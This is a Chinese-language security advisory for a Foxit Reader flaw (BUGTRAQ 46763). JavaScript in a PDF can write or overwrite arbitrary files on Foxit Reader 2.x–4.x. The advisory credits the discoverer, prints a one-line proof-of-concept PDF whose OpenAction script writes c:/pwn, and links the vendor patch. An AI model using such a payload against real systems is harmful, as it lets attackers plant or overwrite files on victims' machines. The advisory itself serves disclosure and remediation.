受影响系统:
Foxit Foxit Reader 4.x
Foxit Foxit Reader 3.x
Foxit Foxit Reader 2.x
不受影响系统:
Foxit Foxit Reader 4.3.1.0218
描述:
BUGTRAQ ID: 46763
Foxit Reader是一款小型的PDF文档查看器和打印程序。
Foxit Reader在处理JavaScript的实现上存在安全漏洞,攻击者可利用此漏洞在受影响系统上写入或覆盖任意文件。
<*来源:Chris Evans (chris@scary.beasts.org)
链接:http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Chris Evans (chris@scary.beasts.org)提供了如下测试方法:
%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (createDataObject\(‘c:/pwn’,’pwn’\))>> trailer<</Root 1 0 R>>
建议:
厂商补丁:
Foxit
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.foxitsoft.com/wac/server_intro.php
0 条评论。